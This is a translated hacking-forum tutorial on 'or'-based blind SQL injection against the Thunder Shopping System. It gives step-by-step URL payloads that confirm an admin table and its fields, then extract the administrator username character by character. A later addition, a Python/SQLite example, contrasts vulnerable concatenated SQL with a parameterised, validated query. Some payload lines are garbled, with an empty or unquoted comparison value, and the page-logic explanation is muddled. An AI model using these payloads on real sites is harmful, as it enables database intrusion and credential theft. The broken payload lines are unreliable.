There are newer or injection tutorials on the website. You can look them up and read them together with this one.
Author: fallen leaves flying & Huaxia chicken head 4 [s.s.s.t]
Source: Evil Octal Information Security Team (www.eviloctal.com)
Note: First published on the Script Security Group forum (www.cnsst.org), then submitted by the original author to the Evil Octal Information Security Team. When reposting, please credit the site of first publication.
PS: It's been a long time. The article was published in April and was recently modified. The article is a bit messy. Don't be surprised.
I remember a friend of Firefox asked me a year ago: if a site filters "and" and "", how can it be injected? At that time, I casually said "or injection". Later I read the post and asked him how to use it. I wrote a few simple statements for him and told him to change his mind. He was very grateful to me and said there was no such method on the Internet. I checked on the Internet and found that there was no topic on or injection (except for or 1=1). So today, one year later, I have written this article.
We use the Thunder Shopping System to demonstrate or injection. We first use or 1=1 and or 1=2 to test whether there is an injection point. Let's first look at the normal page. Now we use or 1=1 to test whether the injection vulnerability exists: a different page is returned. Then we test or 1=2: the normal page is returned. So a correct guess returns the error page and a wrong guess returns the normal page, the reverse of and injection. The reason is that with or, a true condition makes the where clause match every row instead of only id=1, so the page changes, while a false condition leaves the original result untouched. This is the real "false is true or false", and it's more classic than lake2's IP spoofing.
Let's construct the test statement:
vpro.asp?id=1 or exists (select * from admin)
The error page is returned, indicating that the admin table exists. Let's try another table!
vpro.asp?id=1 or exists (select * from n0h4ck)
The table n0h4ck does not exist.
Let's continue and construct the statement.
vpro.asp?id=1 or exists (select admin from admin)
The or 1=1 page is returned, indicating that the admin table has the admin field.
vpro.asp?id=1 or exists (select padd from admin)
The or 1=2 page is returned, indicating that the padd field does not exist in the admin table.
Now we start to guess the data:
vpro.asp?id=1 or (select mid(admin,1,1) from admin)=n
The or 1=2 page is returned, indicating that the first character of the first record in the admin field of the admin table is not "n".
Let's try again:
vpro.asp?id=1 or (select mid(admin,1,1) from admin)=
The or 1=1 page is returned, indicating that the first character of the first record in the admin field of the admin table is "a". So what is the first record? Of course it is "admin".
Let's use the left function to confirm:
vpro.asp?id=1 or (select left(admin,5) from admin)=admin
The guess is correct. It is indeed admin. I don't need to spell out the rest!
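Why a true condition returns the different page, and what closes the hole, as an added example (not code from the original article). It uses Python with an in-memory SQLite database in place of the ASP shop; the products table, its rows and the function names are assumptions made for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data standing in for the shop database.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO products VALUES (1,'book'),(2,'pen'),(3,'lamp');
        CREATE TABLE admin (admin TEXT, password TEXT);
        INSERT INTO admin VALUES ('admin','constructed-secret');
    """)
    return db

def lookup_vulnerable(db, raw_id):
    # The 'before': the id parameter is concatenated into the SQL text,
    # so "1 or <condition>" becomes part of the WHERE clause.
    sql = "SELECT name FROM products WHERE id = " + raw_id
    return [row[0] for row in db.execute(sql)]

def lookup_hardened(db, raw_id):
    # The fix: accept only ASCII digits, then bind the value as a parameter
    # so it can never be parsed as SQL.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be a number")
    cur = db.execute("SELECT name FROM products WHERE id = ?", (int(raw_id),))
    return [row[0] for row in cur]

if __name__ == "__main__":
    db = make_db()
    tests = ("1", "1 or 1=1", "1 or 1=2", "1 or exists (select * from admin)")
    for raw in tests:
        # True condition: every row matches, so the page differs.
        # False condition: only id=1 matches, so the page looks normal.
        print(repr(raw), "->", lookup_vulnerable(db, raw))
        try:
            print("   hardened:", lookup_hardened(db, raw))
        except ValueError as exc:
            print("   hardened: rejected,", exc)
```
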